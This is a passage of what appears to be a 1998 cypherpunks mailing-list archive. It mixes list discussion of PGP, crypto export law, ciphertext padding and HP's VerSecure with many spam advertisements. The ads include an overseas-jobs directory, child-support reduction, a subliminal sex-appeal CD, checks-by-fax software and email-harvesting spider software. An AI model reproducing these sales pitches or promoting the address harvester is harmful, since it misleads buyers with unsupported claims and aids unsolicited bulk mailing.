Africa* Middle East* South East Asia* Japan* South America* Caribbean*
Brazil* Far East* China* Malaysia* Russia*

Our detailed guidelines will assist you to apply for overseas jobs listed with
IRDI's Directory.  Included are foreign-based and US corporations with
thousands of current openings outside of the US. Most employers will pay
for your relocation expenses.  Your food, accommodations and
transportation to your new career position are all usually included in a
package offer, as well as several weeks of annual paid vacation and
other benefits for you and your family.

Our Directory listings are continually updated from leading worldwide
on-line databases and regular contact with international employers and
search firms. We will provide you our Directory of International Recruiters
and Employers for only $39.95 (shipping and tax included).

We want to do all we can to make your new career in the international
marketplace a resounding success!  If you wish, we can provide you
with an effectively composed internationally formatted resume at an
affordable price!  Please fax us your fully completed international resume
worksheet (which you will find at the end of your Directory),
and we will call you with a quote.

Once your resume is prepared, we can also mail your resume to your
selected targets at a nominal expense over our direct out-of-pocket
costs (e.g. postage, stationery, printing, etc.).
Our Fax is (213) 380-1288 Phone: (213) 385-0557, or (213) 385-8388

THIS WILL BE THE FIRST STEP IN THE MOST IMPORTANT
CAREER DECISION OF YOUR LIFE!  ORDER NOW!

Send check or money order for $39.95 payable to:

International Research & Data Institute
Attn: Research Department
Howard Hughes Center, Fifth Floor
6601 Center Drive West
Los Angeles, CA 90045

Please include your name, return address & telephone number.

********************************************************************************
Obtain the current issue (via COD); Send us an inquiry to our address
above, or call us at (213) 385-0557. After business hours please leave
a message giving us your name, address and phone number. You can
also Email us your COD order to;
IRDI@overseaswork.com (please put "COD Order" as the subject)

Directory of International Recruiters and Employers,
via COD is $49.95, (tax, shipping and COD charges included).
********************************************************************************

P.S. Feel free to visit our Web Site and learn more about us @
www.overseaswork.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 67471470@30410.com
Date: Tue, 3 Mar 1998 00:33:26 -0800 (PST)
To: Friend@public.com
Subject: LOWER YOUR CHILD SUPPORT!!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
LOWER YOUR CHILD SUPPORT!!!

Don't be a DEADBEAT DAD!!!

Join the FATHERS' RIGHTS COALITION and learn how to legally reduce
your court-ordered child support WITHOUT AN ATTORNEY.Millions of FATHERS 
have been unjustly labeled as DEADBEAT DADS because they cannot afford 
to pay their child support due to factors beyond their control such as unemployment,
under employment, and unforeseen or unexpected expenses.

Most fathers are treated unfairly by the courts because they cannot afford the expense
of an attorney.  Even worse, fathers that employ an attorney to assist them in trying to 
obtain a child support reduction end up having to explain to the court why they can
pay an attorney and not pay child support. 

Failure to fully pay your child support can cause you to lose your drivers, business or
professional license.  As well, owing child support can ruin your credit rating and 
prevent you from obtaining employment.  Your failure to pay all of your child support 
can cause you to be jailed or imprisoned. Ignorance or inaction could totally ruin your life!

For only $49.90 you can join the FATHERS' RIGHTS COALITION and receive with
your membership the publication entitled REDUCE YOUR CHILD SUPPORT
WITHOUT AN ATTORNEY.

REDUCE YOUR CHILD SUPPORT WITHOUT AN ATTORNEY is an easy-to-read publication
which could instruct you as to the law and procedure required to obtain your right to a reduction 
from your present child support order.  As well, this publication will inform you on how to dispute 
and/or reduce past child support arrearages, interest and penalties.

As a member, you can also receive information on low-cost paralegal services which can assist 
you in preparation of the court forms necessary to reduce your child support..  

As a member, you will receive the FATHERS' RIGHTS COALITION NEWSLETTER.  
This newsletter contains information about recent changes in the child support laws and tips 
on presenting your case in court.As a member, you will be making a statement to the politicians 
that you're tired of being abused by the law and the courts.

Most importantly, as a member you can educate yourself in the court process and 
obtain your rights to due process and a fair child support order.

One of our members (who had only a high school education) was able to obtain a child support
order of $.00 dollars (zero) for over eighteen (18) months. (Superior Court of the State of California,
County of Siskiyou, Coonrod v. Coonrod, Case No. 35594)

TO JOIN fill in the application and mail to the address
with your one-time membership fee of $49.90.  
(Allow 2-4 weeks for delivery of REDUCE YOUR CHILD SUPPORT WITHOUT AN ATTORNEY)


Send the completed application with $49.90, one-time membership fee ,to:


				FATHERS RIGHTS COALITION
				702 Mangrove Ave.,  Suite 134
				Chico,  CA 95926


----------------------------------------------------------------------------------------------------- 

YES, I want to join the  FATHERS' RIGHTS COALITION.  I have enclosed $49.90 for the lifetime membership.  
Upon receipt of my application and membership, send me REDUCE YOUR CHILD SUPPORT WITHOUT AN ATTORNEY..
                               
                               E-Mail Address _________________
                                                                                                                                 002
		
                                Name______________________________________

 		Address______________________________________

		City__________________ State ________  Zip 	_________




</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 1 Mar 1998 13:52:33 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Return of Bass-O-Matic (was PGP)
Message-ID: <199803010600.AAA01504@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 01 Mar 1998 15:25:00 +1000
> From: Reeza! <howree@cable.navy.mil>
> Subject: PGP

> I'm looking for some real information on PGP.
> I have a friend who swears up and down that every version of PGP since the
> first one has been compromised by key escrow and is not really safe.
> 
> Does anyone know where the source for the *original* version of PGP can be
> found? 

Holy bezesus...

It just so happens that I have a copy of pgp10.arj and pgp10src.arj.

Send me a note and I'll make arrangements to get them to you provided you're
in the US and a US citizen (I hate these fuckin' laws - I wanna be paid for
this shit!).


    ____________________________________________________________________

                When a man assumes a public trust, he should
                consider himself public property.

                                         Thomas Jefferson
                                     _____                         
       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 2 Mar 1998 03:33:29 +0800
To: Ross Wright <rwright@bsd.adnetsol.com>
Subject: Re: AnyWho puts a reverse phone book on the Net
In-Reply-To: <199802260451.UAA01651@rigel.cyberpass.net>
Message-ID: <Pine.BSF.3.91.980301001641.18268E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




I tried one of these when tracking down some dial-in system abuse being 
perpetrated by an ex-employee.

It occurred to me that with the right hardware, a simple perl script 
could launch a cruise-missle strike in response to a dial-in to a phone 
number ...  ;)

(for a good time, call 1-555-2nukeme)

food for thought for the paranoids and/or x-files fans.



On Wed, 25 Feb 1998, Ross Wright wrote:

> From:
> 
>     T a s t y   B i t s   f r o m   t h e   T e c h n o l o g y   F r o n t
>     This issue: < http://www.tbtf.com/archive/02-23-98.html >
>     ________________________________________________________________________
> 
> ..AnyWho puts a reverse phone book on the Net
> 
>   And personal privacy slips a bit more
> 
>     If you live in the US and your phone number is listed, visit this
>     site [25] and type in your number. AT&T's AnyWho will return your
>     name and address. Is your street name linked? If so, click to see
>     names and numbers for all of your neighbors. Want a map to your
>     house? It's one click away. (Like most such maps, however, the
>     correspondence of street address with map location can be wildly
>     wrong.) The street proximity search will not show unlisted numbers,
>     800- or 888- numbers, or "distinctive ring" alternate numbers.
> 
>     AnyWho is not the first reverse phone book on the Net -- 555-1212
>     has that distinction [26] -- but it is the most feature-rich. It
>     has a "sounds like" match for last name lookups. It lets you edit
>     or delete your entry, and requires confirmation by a telephone call
>     from the phone number in question. And it combines white and yellow
>     pages -- 90M and 10M listings respectively -- though their output
>     remains separate. When you ask for a street proximity listing for a
>     business listing, you see only other businesses.
> 
>     [25] http://www.anywho.com:81/telq.html
>     [26] http://www.555-1212.com/whte_us.htm
> 
> =-=-=-=-=-=-
> Ross Wright
> King Media: Bulk Sales of Software Media and Duplication Services
> http://ross.adnetsol.com
> Voice: (408) 259-2795
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 9 Mar 1998 04:27:22 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: [LEGAL] Crypto as Contraband?
In-Reply-To: <v03102809b1265edd4202@[207.167.93.63]>
Message-ID: <Version.32.19980307112304.00e0c100@shell11.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
At 06:20 PM 3/6/98 -0800, Tim May wrote:
> How could any "outlawing of unescrowed crypto" conceivably
> deal with this vast amount of distributed software? Will a
> user of RSA's MailSafe program face jail time for using a
> program he legally bought in 1991 (as I did)?
>
> More questions than answers. Can anybody help me to
> understand the legal issues?

You are getting out of date.  As the rule of law dissolves,
legal issues become insignificant, and will in due course
vanish altogether.

For example nobody knows what are the "legal issues" with
putting strong crypto on a web site, as I have done.
According to what the legislation says, what I have done is
completely in accord with legislation.  Indeed, it is
completely in accord with US legislation simply to post the
stuff. on any server inside the US, the foreigner doing the
download is violating the legislation, not the person who put
it up.  I have gone considerably further than is required by
legislation, though not nearly as far as some others have
gone.

But mere legislation counts for less and less these days.  If
you read the business press, you will frequently read them
complain of cases where the distinctions between executive,
legal, and judicial powers are effectively dissolved, and
penalties are in effect adminstratively applied for undefined
offences, or retrospectively and administratively defined
offences, often in ways that appear to personally enrich those
administering these quasi judicial powers.

Generally this sort of thing is only applied to people who
are unpleasant and unpopular.  Tobacco companies, junk bond
merchants whose businesses have been more profitable for
themselves than for many of their investors, and the like.
Of course this creates a large vested interest in demonizing
more and more people, so that more and more people can be
dealt with in this fashion.

Similar measures are applied not only to alleged recreational
drug distributors, but to lawyers who defend alleged
recreational drug distributors, but the business press tends
to report such cases less. 

Meanwhile formerly totalitarian countries, such as China and
Cuba, where there used to be no such things as laws, merely
some people having the power to harm other people, power
exercised in accordance with rules that those subject to this
power were forbidden to know, are moving towards the rule of
law.  It used to be that if someone imprisoned in Cuba were
to discover the actual reason for his imprisonment, he might
possibly suffer some draconian additional punishment for
improper possession of state secrets.

In a fully totalitarian state, the regime does not have rules
for most people, merely goals and desires.  If some desire is
not fulfilled, the masters will go around killing people more
or less at random until somebody fulfills that desire, or
until they have killed so many people that they suspect that
what they desire is not readily achievable, or sometimes
until they simply run out of people who might be able to
assist in fulfilling that desire.  For example all people
possessing certain skills and experience were wiped out by

Stalin, and in Cambodia everyone connected to the jute
industry in any way. Such rules as exist only apply to the
privileged, to those administering the terror, not to those
terrorized.

Crypto legislation is likely to resemble the announcement of 
a desire, rather than the announcement of rules and 
restrictions likely to fulfill that desire.  Indeed, the
proposals we have so far seen are desires, not rules. 

As you point out, that desire cannot be fulfilled, except by
means that further radically undermine the rule of law.


    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     KheXnmd1kekBNA4gB1wyUeQgjPT7Y26FWeajCBIR
     43jg9sJBVPllkPf+Yt2ByoAf/sIdt9xbXwh/wMV+Z






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 16 Mar 1998 01:19:03 +0800
To: pnet@proliberty.com
Subject: RTFM
In-Reply-To: <279b5b66b1c8ac3768a7bfc174f33a21@anon.efga.org>
Message-ID: <v03102800b131ba8e4791@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:12 AM -0800 3/15/98, Anonymous wrote:

>I wish Schneier indicated _how_ one makes compressible ciphertext. I am
>certainly no expert here. Have much reading to do!

Offhand, there are many ways to "pad out" ciphertext so as to make it more
compressible by standard compression algorithms.

-- duplicate every character several times, right after it first appears.
This clearly lets a compressor find "compression patterns." True, it looks
pretty obvious to a human eyeball, but it shows the theme.

-- insert sonnets from Shakespear. Same as above.

-- generally, lower the entropy by duplication, insertion, lengthening.


>> There have been hundreds of articles and comments here and on other mailing
>> lists about this. Not that your ideas are not welcome, just to let you know
>> why it's likely your ideas won't be met with a rush of excitement. You
>> might try finding these old analyses and seeing what you can add.
>>
>
>A polite "no amatuers allowed in the clubhouse." How does TCM expect the
>newcomers to learn, if no one will share their accumulated knowledge? That
>is the reason I signed up for this list - to _learn_.

Not a "no amateurs allowed." Not at all. Just an obvious comment that one
cannot expect those of us who've been on the list for years to rewrite and
rewrite and rewrite the same essays. Search engines will turn up much
discussion. If newcomers are too lazy to read Schneier, to read the FAQs,
to read some of the many thousands of articles so conveniently accessible
with search engines, I have no sympathy for them.


--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Mon, 23 Mar 1998 01:13:58 +0800
To: cypherpunks@cyberpass.net
Subject: Encryption without encryption - from Ron Rivest
Message-ID: <v03102800b13af11ba6e9@[17.219.146.26]>
MIME-Version: 1.0
Content-Type: text/enriched

 In a paper entitled "Chaffing and Winnowing: Confidentiality without
Encryption," Ron Rivest describes a method of transmitting a document
that gives an evesdropper no information about the content of the
document. <http://theory.lcs.mit.edu/~rivest/chaffing.txt>

"Winnowing does not employ encryption, and so does not have a``decryption key.''  Thus, the usual arguments in favor of ``keyrecovery'' don't apply very well for winnowing.  As usual, the policydebate about regulating technology ends up being obsoleted bytechnological innovations.  Trying to regulate confidentiality byregulating encryption closes one door and leaves two open(steganography and winnowing)."

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kurt Buff <kurtbuff@halcyon.com>
Date: Tue, 31 Mar 1998 15:20:14 +0800
To: "'cypherpunks@toad.com>
Subject: RE: CIA Trained Gorilla Femnists
Message-ID: <01BD5C30.8CD50C00.kurtbuff@halcyon.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

worst case of performance anxiety I've ever heard of...

On Tuesday, March 24, 1998 5:23 PM, TruthMongrer [SMTP:tm@dev.null] 
wrote:
| Male Gorilla, Released to Mate
|                with Females, Drops Dead
| 
|                AP
|                24-MAR-98
| 
| TOKYO (AP) The excitement, or perhaps the pressure, apparently was 
too
| much for Sultan. The 28-year-old male gorilla, specially moved to a 

| cage to mate with three females, instead dropped dead. 
| 
| The 400-pound lowland gorilla ran around briefly and played with 
his 
| new friends Monday, then suddenly collapsed, apparently after 
suffering 
| a heart attack, said Kunihiko Yasui, head of animal breeding at 
Kyoto 
| Muni
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNR188Q3xegzLXcRmEQKAmgCggAQiHNO9OLy+D87pgdF9HuqXm5wAoMOF
nsU45G3tEXdRYQOojSZAi2qa
=oaNe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sergey Bobok" <sergon@alice.dp.ua>
Date: Thu, 28 May 1998 06:55:49 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199805272108.OAA21191@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Tue, 14 Jul 1998 11:33:58 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199807140330.UAA13890@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



Well since it looks like its a valid converstation peace here, I might as
well give ya my 2 bits worth.




>>http://www.ourfirsttime.com
>>
>>aww... ain't 'dat sweet....
>>
>
>I'd appreciate it more if I hadn't been spammed twice already by
>self-proclaimed born-again Christians attempting to mobilize people
>against those two kids...

Or by one of the weaselly marketers in a while.

Think of it.
You creat a site based on a recent headline making Internet first <the
women who had a child online>.
Then you spam the shit out of everyone faking like your the oposition.
You don't get nailed for spamming
you give your opisition a black eye
you artificially create a media blitz, since the news runs to cover this
confrontation between the relegious right and the new internet morality.

You get about a billion hits
you add one or two click through adds
or some other such thing to the web page

Here comes the big day

Bingo, a quick 30,000$ in your bank account.

You sell the rights to porn companies to include in their feeds
since there is so much product recognition.

;)

smart little bastard
not that I am saying that is what is going on.


not that im cynical or anything....

Ian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com> (by way of x <x@x.com>)
Date: Sat, 28 Feb 1998 15:52:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: cyber FOIA/settlement e-mail
Message-ID: <199802282352.AAA09743@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



God, what a nut!


Friday February 27, 1998 11:18 AM

By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF
Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  request information under the Freedom of Information Act
2  explore settlement possibilities of our current lawsuit.

.... etc. shit deleted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@toad.com
Date: Sun, 1 Mar 1998 01:01:01 -0800 (PST)
Subject: Now You CAN Accept Credit Cards - Guaranteed Approval
Message-ID: <199802270818.CAA11762@mail.t-1net.com>
MIME-Version: 1.0
Content-Type: text/plain


Businesses that don't offer online shoppers a credit card payment option LOSE OVER 80% of their impulse sales for that inconvenience alone! 

Now, for only $39.95 a month, buying your products CAN be EFFORTLESS!

GUARANTEED APPROVAL!  Total Merchant Services has provided low-cost merchant accounts to hundreds of businesses of all sizes, all ages, all credit ratings, for 4 over years. 

For just $39.95, you can lease your own professional Merchant Account Equipment or Software (of course, you can also outright purchase). Either way, you'll begin processing credit card transactions immediately!

 Super Low 2.25% Discount Rate
 No Bank Account Set-Up Fees
 No Monthly Minimum Billing Fee 
 No Statement Fee If No Transactions Processed That Month

Plus, we'll include a Shopping Cart System for your web site ~ FREE! 


Take Charge of Your Success Today! 

Call Total Merchant Services Now At 1-800-374-6477 pin 2420 to receive additional information via email or call back (We'll even pay for the call), or call us directly during normal business hours EST at 1-912-236-6676 to speak us immediately.



|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
If you wish to be removed from our mailing list, please call 1-800-374-6477, pin 2420, 24 hours a day, and you will be manually removed.
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@toad.com
Date: Sun, 1 Mar 1998 03:34:41 -0800 (PST)
Subject: Slick Willie Joke Book Collectible!
Message-ID: <199803010654.AAA06271@mail.t-1net.com>
MIME-Version: 1.0
Content-Type: text/plain


If you want to know the answers to these questions:

 -> What's the difference between Slick Willie and the Titanic?
 -> What do Monica Lewinsky and Bob Dole have in common?
 -> What do Slick Willie and Ken Starr have in common?
 -> How did Slick Willie and Hillary meet?
 -> What does Teddy Kennedy have that Slick Willie wishes he did?
 -> What's the difference between Hillary and a pit bull?

           >>>>>  Then You Have To Get  <<<<<

** THE COMPLETE But Tacky SLICK WILLIE JOKE & ACTIVITY BOOK**

Over 90 pages of jokes and activities lampooning the entire Bubba Gang.  Order now for only $4.99 (plus $1.50 for shipping and 
handling)

A great gift idea too!

================================================================
To receive your joke & activity book, fill out this form and fax it to: 516-424-6519

Name:____________________________________________________

ShipAddress: ____________________________________________
                              
City: ___________________________________________________

State: ____  

Zip: __________     

Daytime Phone: (____)___________


CREDIT CARD ORDERS:

CC#:____________________________________
   (VISA/Mastercard/American Express ONLY)

Exp. Date:____/____

Total Amount:  $6.49  Appear on statement under JERBIL,INC.)

"CHECKS BY FAX" ORDERS:

Please fax your check ($6.49) with the shipping information above
attached to:  912-236-6676

Allow 3-6 weeks for delivery.
Bulk rates of 100, 1000, and 10,000 are available

---------------------------------------------------------------------

If you wish to be removed from our mailing list, please
call 1-800-374-6477 ext. 2420.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 3yy1zc <3yy1zc@ix.netcom.com>
Date: Sun, 1 Mar 1998 01:10:25 -0800 (PST)
To: <cyberlink@infomat.com>
Subject: No Subject
Message-ID: <19943672.886214@relay.comanche.denmark.eu>
MIME-Version: 1.0
Content-Type: text/plain


Authenticated sender is <3yy1zc@ix.netcom.com>
Subject:  3-1
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

EMAIL MARKETING WORKS!!

Bull's Eye Gold is the PREMIER email address collection tool.
This program allows you to develop TARGETED lists of email
addresses.  Doctors, florists, MLM, biz opp,...you can collect
anything...you are only limited by your imagination!  You can
even collect email addresses for specific states, cities, and
even countries!  All you need is your web browser and this program.
Our software utilizes the latest in search technology called
"spidering". By simply feeding the spider program a starting
website it will collect for hours. The spider will go from website
to targeted website providing you with thousands upon thousands of
fresh TARGETED email addresses. When you are done collecting,  the
spider removes duplicates and saves the email list in a ready to
send format. No longer is it necessary to send millions of ads to
get a handful of responses...SEND LESS...EARN MORE!!!

A terrific aspect of the Bull's Eye software is that there is
no difficult set up involved and no special technical mumbo-jumbo
to learn. All you need to know is how to search for your targeted
market in one of the many search engines and let the spider do the
rest! Not familiar with the search engines? No problem, we provide
you with a list of all the top search engines. Just surf to the
location of a search engine on your browser then search for the
market you wish to reach...it's that easy!

For instance if you were looking for email addresses of Doctors
in New York all you would do is:

1) Do a search using your favorite search engine by typing in
the words doctor(s) and New York
2) Copy the URL (one or more)...that's the stuff after the
http://...  for instance it might look like
http://www.yahoo.com/?doctor(s)/?New+York
3) Press the START button

THAT's IT!!!  The Bull's Eye spider will go to all the websites
that are linked, automatically extracting the email addresses
you want.

The spider is passive too! That means you can let it run all
day or all night while you are working on important things or
just having fun on your computer. There is no need to keep a
constant watch on it, just feed it your target market and give
it praise when it delivers thousands of email addresses at
the end of the day!

Features of the Bull's Eye Software:

* Does TARGETED searches of websites collecting the email
  addresses you want!
* Collects Email addresses by City, State, even specific
  Countries
* Runs Automatically...simply enter the Starting information,
  press The Start Button, and it does the rest
* Filters out duplicates
* Keeps track of URLs already visited
* Can run 24 hours per day, 7 days per week
* Fast and Easy List Management
* Also has built in filtering options...you can put in words
  that it "Must" have while searching,...you can even put in
  criteria that it  "Must NOT Have"...giving you added flexibility
* Also imports email addresses from any kind of files (text
  files, binary files, database files)
* List editor handles Multiple files to work on many lists
  simultaneously
* Has a Black-Book feature... avoid sending emails to people
  who do not want to receive it
* Built-in Mail program...send email directly on the internet
  with just a click of your mouse
* Personalized Emails...if the email address has the user's
  name when it is collected,..you can send Personalized emails!!!
* Sort by Location, Server, User Name, Contact Name
* Advanced Operations:
 Email address lists export in many different formats
  (HTML, Comma delimited, text file)
 Advanced editing...Transfer, Copy,  Addition, Delete, Crop,
  Move to Top/Bottom
 Operations between lists...Union, Subtraction, Comparison
* Program is Passive,...meaning you can run other programs at
  the same time

CALL FOR MORE INFORMATION   213-980-7850
CALL FOR MORE INFORMATION   213-980-7850

ORDERING INFORMATION

Customer Name
Company Name
Address
City
State                       Zip
Phone                                       Fax
Email Address

______ BULL'S EYE SOFTWARE   $259.00
Includes Software, Instructions, Technical Support

______ Shipping & Handling  (2-3 Day Fedex)  $10.00
                           (Fedex Overnite) $20.00

______  TOTAL
                 (CA Residents add applicable sales tax)

*All orders are for Win 95 and Win NT

                *****CREDIT CARDS ACCEPTED*****
                   MASTERCARD   VISA   AMEX

   PLEASE CALL 213-980-7850 to process your order
                        9am-5pm Pacific Time
                Checks or Money Orders send to:
                      WorldTouch Network Inc.
5670 Wilshire Blvd.  Suite 2170 Los Angeles, CA 90036
Please note:  Allow 5 business days for all checks to
clear before order is shipped.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Sun, 1 Mar 1998 04:29:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP Crypto Hardware
Message-ID: <199803011211.EAA24273@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


With regard to:

> Hewlett-Packard Granted License For Encryption System 
> 
> The Commerce Department has granted Hewlett-Packard an 
> export license for its VerSecure encryption architecture...
> The catch is that the products must take their orders 
> from a central computer...will dictate how...products 
> will behave in each country. 

No fucking way!

> The company hopes that the solution would break the 
> deadlock between the Clinton Administration...and the 
> computer industry...

"The company hopes that its solution of a gun that will
shoot forward in jurisdictions that allow possession of
firearms and backward in jurisdictions that prohibit same
will break the deadlock between overweening, self-inflated,
scum-sucking, dog-fucking, shit-brained totalitarians and
those seeking nothing more than to be LEFT THE FUCK ALONE."

Whores! Two-dollar whores! 25-cent whores! HP can stick its
encryption card and everything else it makes straight up
its mercenary ass. HP just created a powerful incentive for
a lot of very capable and creative people to see to it that
HP products don't exactly shine in the marketplace, if you
get my drift.

> The new solution effectively disconnects the problem 
> of distributing encryption technology from the process 
> of determining the policy for government access to 
> information. 

Wonderful! That's like selling nerve gas that calls 
Washington to ask permission before it deploys. Stupid,
stupid, STUPID fucking assholes!

> The heart is a new class of trusted hardware cards and 
> chips that take their orders from a central company
> known as a Security Domain Authority or SDA. In countries
> like France that require people to keep a record of keys 
> for unlocking data, the SDA would only allow the computers 
> to encrypt information if it complied with the laws. 

The communists were right on one point. Capitalists will 
sell them the rope that will be used to hang them. And 
hang their children.  Stupid, stupid, STUPID!

> In countries with no laws about encryption usage like 
> the United States, Germany and Great Britain, the SDA 
> would allow users to encrypt in whatever manner they 
> choose. 

Yeah, _today_.  And what about _tomorrow_, you astronomical
fuckwits? What about when the USG decides that with this
neat mechanism in place they will just advise Slavery
Central that citizen-units in the US may no longer encrypt
things "in whatever manner they choose?"

Names. We need names publicized. Who thought of this 
monstrous product? Who approved it? Who developed it? Who 
signed off on it, saying, "Yeah, this will really make 
our stockholders proud! Who gives a shit if their kids and grandchildren live under the iron fist of a U.S. 
technocratic dictatorship? We're gonna score a few points 
here, make a little extra bonus this year, lock it in with 
a couple of patents... Who cares if we all end up with 
brainchip implants?"

> Hewlett-Packard sees the solution as a win for the 
> industry, which will be able to build one set of 
> hardware and software that can be shipped throughout 
> the world. The SDA's will set the local rules because 
> the computers will not encrypt information without 
> first getting permission from the SDA.

This is too abominable for words. It's the ultimate
sell-out. I know now that there is no hope, not even
a spark of the flame of freedom to illuminate the gloom
into which we are headed. What's the use of being a
well-behaved citizen-unit when this kind of utter shit
is afoot or underfoot? It's war. It's always been war,
we just haven't understood that it was war. The other
side has understood it from the start.

> Doug McGowan, one of the director of Hewlett-Packard's 
> efforts, said in a telephone interview, "Never before 
> has a general purpose cryptography tool been exportable 
> from the United States, with or without key recovery. 
> We're opening a huge market for American industry to 
> enable commerce on a worldwide basis." 

!!! Some justification, eh Doug? Hey Doug! When they ask
for cerebral implants that explode on command, will you
offer a similar product that checks with Citizen Control
Central before detonating, to make sure the target is in
a country that authorizes it? "Hey, no problem!" says
Doug. "Our new CerebSecure will only explode heads in
countries like Iran, Iraq, Cuba, and North Korea when
people attempt to make unauthorized purchases with its
electronic purse feature. In countries with no laws 
about political or religious transactions like the 
United States, Germany^H^H^H^H^H^H^H^H^H and Great 
Britain, the SDA would allow users to purchase in 
whatever manner they choose."

> The price for this flexibility is the need for 
> specialized hardware that treats the SDA as its 
> master. In an ordinary computer, the owner can 
> control all aspects of what the computer does. 
> This extra hardware will raise the price of machines 
> and is bound to be more expensive than software which 
> can be distributed at minimal cost. 

Yeah, this is just the kind of thing that Americans, even
with their severly dulled sense of freedom, will run 
right out to buy! Sure. First we can expect to see the
feds mandate this for all government purchases, then at
some point mandate the chipset for all computers, then
outlaw encryption that doesn't use the chipset. And I
don't even own a crystal ball anymore!

> Feisal Mosleh [said], "...It...gives us a lot of 
> strength in terms of tamper resistance."

OK, I give up. Where is the tamper resistance for the 
Constitution? Is anybody working on that? HEL-lo????

<deathly still silence>

FuckWithMeMongerII





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jenny.n18@usa.net
Date: Sat, 28 Feb 1998 22:20:02 -0800 (PST)
To: jenny.n18@usa.net
Subject: Attraction
Message-ID: <0000000000.AAA000@usa.net>
MIME-Version: 1.0
Content-Type: text/plain


Do you want to succeed at dating, or you just need a little spark to your
relationship or marriage?

Well here is the Answer for you!

Sensations(r), the new Compact Disc that  uses proven subliminal techniques to
increase your chances of SEXUAL success with the opposite sex.. Simply play it
and watch it work!!!!

do you want to be a winner?   

If yes then go to http://207.134.166.10/users/subliminal/subliminal.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: business@checkfax.net
Date: Sun, 1 Mar 1998 07:03:43 -0800 (PST)
To: friend@bulkmailernet.com
Subject: AD: Complete Checks by Fax Software
Message-ID: <199803011503.HAA05521@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Did you know that over 125 Million people in the U.S. have checking
accounts? Out of those people over 70 Million DO NOT have a credit
card..

Now, YOU can tap into this huge customer base by using Checker.

Checker, a revolutionary new way to accept payment via fax, phone, 
or even e-mail is now available through TDN Publishing, Inc. for 
only $14.95 if you order before March 1.  Checker is a complete
check management system designed to speed up the ordering process
by enabling customers to fax or email payments rather than send via 
postal service (snail mail).  By expanding payment options,
businesses
can appeal to a larger array of customers, possibly resulting in
increased
sales.

Checker is a full featured check printing software package that will
allow
you to take your customers information and immediately print out a
check
that you can deposit the very same day!

IS CHECK-BY-FAX LEGAL?  Accepting a Check-by-Fax is not only cost 
effective and very simple, it IS PERFECTLY LEGAL!  Although the 
Internet offers "Secure Servers" for credit card purchases,
questions 
of safe electronic commerce remain.  many large companies who sell 
products or services on the Internet offer Check-by-Fax as a payment
option.

